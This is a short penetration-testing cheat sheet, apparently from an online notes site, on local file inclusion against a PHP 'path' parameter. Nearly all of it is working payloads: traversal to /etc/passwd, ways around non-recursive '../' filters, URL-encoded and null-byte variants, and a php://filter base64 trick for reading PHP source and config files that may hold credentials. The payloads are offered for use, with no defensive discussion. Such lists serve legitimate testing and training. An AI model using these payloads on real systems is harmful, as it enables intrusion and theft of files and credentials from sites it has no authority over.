LFI

LFI techniques

Basic LFI

  • Basic: /index.php?path=/etc/passwd

  • Path traversal: /index.php?path=../../../../etc/passwd

  • Name prefix (like /etc/our_input): /index.php?path=/../../../etc/passwd

  • Approved Path (If the webserver errors if you don't go to some directory above first): /index.php?path=./directories_above/../../../../etc/passwd

More advanced LFI

  • Nonrecursive ../ filter: /index.php?path=....//....//....//....//etc/passwd

  • URL encode payload: /index.php?path=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64

  • If the webserver appends .php to our input

    • Using null byte to make string end (obsolete): /index.php?path=../../../../etc/passwd%00

    • Read php files (maybe some source code to login or config file that has credentials):

      1. /index.php?path=php://filter/read=convert.base64-encode/resource=webconfig (webconfig turns into webconfig.php)

      2. Take ALL of the base64 that is shown on the page and echo "base64" | base64 -d

PreviousLFI/RCENextWhat to do once obtained

Last updated